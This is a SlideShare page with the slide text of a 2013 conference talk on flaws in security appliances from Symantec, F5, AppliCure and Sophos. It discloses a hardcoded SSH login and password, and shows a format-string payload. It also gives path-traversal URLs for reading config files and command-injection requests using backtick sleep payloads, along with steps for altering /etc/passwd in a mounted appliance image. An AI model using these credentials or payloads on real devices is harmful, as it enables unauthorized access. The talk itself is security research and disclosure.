SlideShare a Scribd company logo

1.3. (In)security Software

defconmoscow
defconmoscow

Security software products are not immune to vulnerabilities. The document discusses vulnerabilities found in Symantec Messaging Gateway, F5 BIG-IP, AppliCure dotDefender WAF, and Sophos Web Protection Appliance that allowed unauthorized access or code execution on the devices. Exploiting vulnerabilities in security software is common due to weaknesses being found in the software itself or misconfigurations of services running on the devices.

Related slideshows

DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
DFIR Austin Training (Feb 2020): Remote Access & Deploying AgentsDFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
DFIR Austin Training (Feb 2020): Remote Access & Deploying Agents
 
[OWASP Poland Day] Web App Security Architectures
[OWASP Poland Day] Web App Security Architectures[OWASP Poland Day] Web App Security Architectures
[OWASP Poland Day] Web App Security Architectures
 
The hacker playbook: How to think and act like a cybercriminal to reduce risk...
The hacker playbook: How to think and act like a cybercriminal to reduce risk...The hacker playbook: How to think and act like a cybercriminal to reduce risk...
The hacker playbook: How to think and act like a cybercriminal to reduce risk...
 
1 of 31
Download to read offline
(in)Security Software By Alexander Antukh May 26, 2013
/whoami Alexander Antukh  Security Consultant  Offensive Security Certified Expert  Interests: kittens and stuff
3 Agenda • Introduction • What is Security Software • Historical review • The Question • The Answer • Vuln, where art thou? • Afterward • QA (in)Security Software
4 The question Do you know anybody less boring? What if the SS is vulnerable itself? (in)Security Software
5 The answer *sorry for my English (in)Security Software
The answer • Symantec Messaging Gateway – Backdoor by design Code execution • F5 BIG-IP – SQL Injection, XXE Passwords… Root access • Applicure dotDefender WAF – Format string vulnerability Code execution • Sophos Web Protection Appliance – LFI, OS Command Injection Command execution, admin account pwn Security software products are the target of the trade ... already! 6 (in)Security Software
The answer “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“ Symantec Messaging Gateway v.9.5.x SSH?! Login: support MD5: 52e3bbafc627009ac13caff1200a0dbf Password: symantec 7 (in)Security Software
The answer “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“ Symantec Messaging Gateway v.9.5.x SSH?! Login: support MD5: 52e3bbafc627009ac13caff1200a0dbf Password: symantec 8 (in)Security Software
The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 9 (in)Security Software
The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 10 (in)Security Software
The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 11 (in)Security Software
The answer “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ sam/admin/reports/php/getSettings.php  12 F5 BIG-IP <= 11.2.0 (in)Security Software
The answer “... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...“ Web Attack? 13 AppliCure dotDefender WAF <= 4.26 (in)Security Software
14 The answer • %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field • %RID% - reference ID • %IP% - server's IP address • %DATE_TIME% - date of blocked request Error page can be configured in different ways: Vars to be added to the body of a custom page: Looks nice… AppliCure dotDefender WAF <= 4.26 (in)Security Software
15 The answer Format string injection • Variables • Buffer • ... • AP_PRINTF() check for format string vulnerabilities … should be <%IP%> Host: … Algorithm: %666dxBAxADxBExEF… AppliCure dotDefender WAF <= 4.26 (in)Security Software
16 The answer Format string injection • Variables • Buffer • ... • AP_PRINTF() check for format string vulnerabilities … should be <%IP%> Host: … Algorithm: %666dxBAxADxBExEF… AppliCure dotDefender WAF <= 4.26 (in)Security Software
17 The answer “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 https://<host>/cgi-bin/patience.cgi?id=.. ?id=../../persist/config/shared.conf%00 ?id=../../log/ui_access_log%00 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8 d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" Passwords! (in)Security Software
18 The answer ` POST /index.php?c=diagnostic_tools HTTP/1.1 ... action=wget&section=configuration&STYLE=<validsessid>&url=%60sle ep%205%60 Diagnostic Tools “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
19 The answer ` https://<host>/end-user/index.php?reason=application&client- ip=%20%60sleep+10%60 Block page (%%user_workstation%%“) “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
20 The answer POST /index.php?c=local_site_list_editor HTTP/1.1 ... STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'" ,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Local Site List ` “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
21 The answer POST /index.php?c=local_site_list_editor HTTP/1.1 ... STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'" ,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Local Site List ` “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
22 The answer Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
23 Agenda • Introduction • What is Security Software • Historical review • The Question • The Answer • Vuln, where art thou? • Afterward • QA (in)Security Software
Vuln, where art thou? • Methods for identifying usable bugs in “Software products” – Applicaton testing and Fuzzing – Reverse engineering – Source code analysis • A short note on so called “security scanning” tools 24 (in)Security Software
Vuln, where art thou? • The workflow for the appliance analysis is pretty simple! – get a virtual appliance demo version – install the appliance – add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files) – add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config) – start the appliance again and log in :) – look at the services that are running (and their configuration) – pwnage ;) 25 (in)Security Software
Vuln, where art thou? • The workflow for the appliance analysis is pretty simple! – get a virtual appliance demo version – install the appliance – add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files) – add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config) – start the appliance again and log in :) – look at the services that are running (and their configuration) – pwnage ;) 26 (in)Security Software
Vuln, where art thou? *Move two matches to make it three equal squares 27 (in)Security Software
Vuln, where art thou? *Move two matches to make it three equal squares 28 (in)Security Software
29 Agenda • Introduction • What is Security Software • Historical review • The Question • The Answer • Vuln, where art thou? • Afterward • QA (in)Security Software
30 Sometimes it’s easier to find the vulnerability than it might be expected . . . *doesn’t exist yet And now for something completely different (in)Security Software
QA (in)Security Software

More Related Content

1.3. (In)security Software

  • 2. /whoami Alexander Antukh  Security Consultant  Offensive Security Certified Expert  Interests: kittens and stuff
  • 3. 3 Agenda • Introduction • What is Security Software • Historical review • The Question • The Answer • Vuln, where art thou? • Afterward • QA (in)Security Software
  • 4. 4 The question Do you know anybody less boring? What if the SS is vulnerable itself? (in)Security Software
  • 5. 5 The answer *sorry for my English (in)Security Software
  • 6. The answer • Symantec Messaging Gateway – Backdoor by design Code execution • F5 BIG-IP – SQL Injection, XXE Passwords… Root access • Applicure dotDefender WAF – Format string vulnerability Code execution • Sophos Web Protection Appliance – LFI, OS Command Injection Command execution, admin account pwn Security software products are the target of the trade ... already! 6 (in)Security Software
  • 7. The answer “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“ Symantec Messaging Gateway v.9.5.x SSH?! Login: support MD5: 52e3bbafc627009ac13caff1200a0dbf Password: symantec 7 (in)Security Software
  • 8. The answer “... inbound and outbound messaging security, with effective and accurate real-time antispam and antivirus protection, advanced content filtering, data loss prevention, and email encryption ...“ Symantec Messaging Gateway v.9.5.x SSH?! Login: support MD5: 52e3bbafc627009ac13caff1200a0dbf Password: symantec 8 (in)Security Software
  • 9. The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 9 (in)Security Software
  • 10. The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 10 (in)Security Software
  • 11. The answer F5 BIG-IP <= 11.2.0 “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ 11 (in)Security Software
  • 12. The answer “... from load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available ...“ sam/admin/reports/php/getSettings.php  12 F5 BIG-IP <= 11.2.0 (in)Security Software
  • 13. The answer “... dotDefender is a web application security solution (a Web Application Firewall, or WAF) that offers strong, proactive security for your websites and web applications ...“ Web Attack? 13 AppliCure dotDefender WAF <= 4.26 (in)Security Software
  • 14. 14 The answer • %MAILTO_BLOCK% - email entered in the “Email address for blocked request report” field • %RID% - reference ID • %IP% - server's IP address • %DATE_TIME% - date of blocked request Error page can be configured in different ways: Vars to be added to the body of a custom page: Looks nice… AppliCure dotDefender WAF <= 4.26 (in)Security Software
  • 15. 15 The answer Format string injection • Variables • Buffer • ... • AP_PRINTF() check for format string vulnerabilities … should be <%IP%> Host: … Algorithm: %666dxBAxADxBExEF… AppliCure dotDefender WAF <= 4.26 (in)Security Software
  • 16. 16 The answer Format string injection • Variables • Buffer • ... • AP_PRINTF() check for format string vulnerabilities … should be <%IP%> Host: … Algorithm: %666dxBAxADxBExEF… AppliCure dotDefender WAF <= 4.26 (in)Security Software
  • 17. 17 The answer “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 https://<host>/cgi-bin/patience.cgi?id=.. ?id=../../persist/config/shared.conf%00 ?id=../../log/ui_access_log%00 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8 d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" Passwords! (in)Security Software
  • 18. 18 The answer ` POST /index.php?c=diagnostic_tools HTTP/1.1 ... action=wget&section=configuration&STYLE=<validsessid>&url=%60sle ep%205%60 Diagnostic Tools “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
  • 19. 19 The answer ` https://<host>/end-user/index.php?reason=application&client- ip=%20%60sleep+10%60 Block page (%%user_workstation%%“) “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
  • 20. 20 The answer POST /index.php?c=local_site_list_editor HTTP/1.1 ... STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'" ,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Local Site List ` “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
  • 21. 21 The answer POST /index.php?c=local_site_list_editor HTTP/1.1 ... STYLE=<validsessid>&action=save&entries=[{"url"%3a+".'`sleep+10`'" ,+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}] Local Site List ` “... our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users...“ Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
  • 22. 22 The answer Sophos Web Protection Appliance <= 3.7.8.1 (in)Security Software
  • 23. 23 Agenda • Introduction • What is Security Software • Historical review • The Question • The Answer • Vuln, where art thou? • Afterward • QA (in)Security Software
  • 24. Vuln, where art thou? • Methods for identifying usable bugs in “Software products” – Applicaton testing and Fuzzing – Reverse engineering – Source code analysis • A short note on so called “security scanning” tools 24 (in)Security Software
  • 25. Vuln, where art thou? • The workflow for the appliance analysis is pretty simple! – get a virtual appliance demo version – install the appliance – add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files) – add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config) – start the appliance again and log in :) – look at the services that are running (and their configuration) – pwnage ;) 25 (in)Security Software
  • 26. Vuln, where art thou? • The workflow for the appliance analysis is pretty simple! – get a virtual appliance demo version – install the appliance – add the .vmdk to another vm and mount it there (or use a linux fs driver that can mount vmdk files) – add a new user to /etc/passwd, or change UID/shell/password of existing users (or maybe change the sudoers file, sshd config) – start the appliance again and log in :) – look at the services that are running (and their configuration) – pwnage ;) 26 (in)Security Software
  • 27. Vuln, where art thou? *Move two matches to make it three equal squares 27 (in)Security Software
  • 28. Vuln, where art thou? *Move two matches to make it three equal squares 28 (in)Security Software
  • 29. 29 Agenda • Introduction • What is Security Software • Historical review • The Question • The Answer • Vuln, where art thou? • Afterward • QA (in)Security Software
  • 30. 30 Sometimes it’s easier to find the vulnerability than it might be expected . . . *doesn’t exist yet And now for something completely different (in)Security Software